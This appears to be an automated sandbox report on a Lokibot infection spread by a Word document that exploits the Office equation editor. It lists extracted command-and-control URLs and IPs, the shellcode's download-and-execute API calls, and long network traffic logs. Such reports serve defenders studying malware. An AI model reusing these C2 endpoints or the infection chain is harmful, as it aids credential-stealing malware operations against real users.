Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\wininit.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 66.63.187.231 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\mshta.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\mshta.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49164 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.22:49166 -> 198.244.140.41:443 version: TLS 1.2

Source:

Binary string: p7C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.pdb source: powershell.exe, 0000000A.00000002.415492102.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

18_2_00403D74

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F059C ShellExecuteW,ExitProcess,	8_2_035F059C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_035F0499
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F056E URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_035F056E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F039A ExitProcess,	8_2_035F039A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F0587 ShellExecuteW,ExitProcess,	8_2_035F0587
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F05C1 ExitProcess,	8_2_035F05C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F04B3 URLDownloadToFileW,ShellExecuteW,ExitProcess,	8_2_035F04B3

Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk

Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 198.244.140.41:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 66.63.187.231:80
Source: global traffic	TCP traffic: 66.63.187.231:80 -> 192.168.2.22:49167
